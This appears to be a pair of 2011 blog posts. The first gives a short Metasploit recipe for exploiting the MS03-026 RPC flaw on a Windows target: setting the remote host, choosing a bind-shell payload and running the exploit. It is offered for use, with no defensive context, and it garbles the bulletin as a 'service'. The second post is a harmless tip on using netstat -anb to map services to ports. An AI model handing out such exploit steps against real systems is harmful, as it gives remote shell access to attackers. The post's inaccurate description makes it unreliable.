Monday, June 20, 2011

Most Commont Vulnearbility in Windows 2003(MS03-026)

The most common vulnearbility in windows 2003 is "ms03-026" service & most of the time you can exploit with the help of this vulnerability by following below steps :
1. open shell and type "msfconsole".
2. search "ms03-026".
3. copy the exact line shown up and then type use (Shift Insert);
4. show options.
5. set rhost "IP address of the target system";
6. show payloads;
7. set payload window/shell_bind_tcp;
8. exploit.

Sunday, June 12, 2011

In Windows finding out which service is running on which port

Hi,
In windows if you want to find out which service is running on which port, for example you want to know httpd server is running on which port then you can do following steps for that :

1. Open cmd as administrator (right click on cmd icon and run as administrator) otherwise you will get error "Elevation is required" while running the command.

2. type netstat -anb and press enter. Bingo you will get all the details.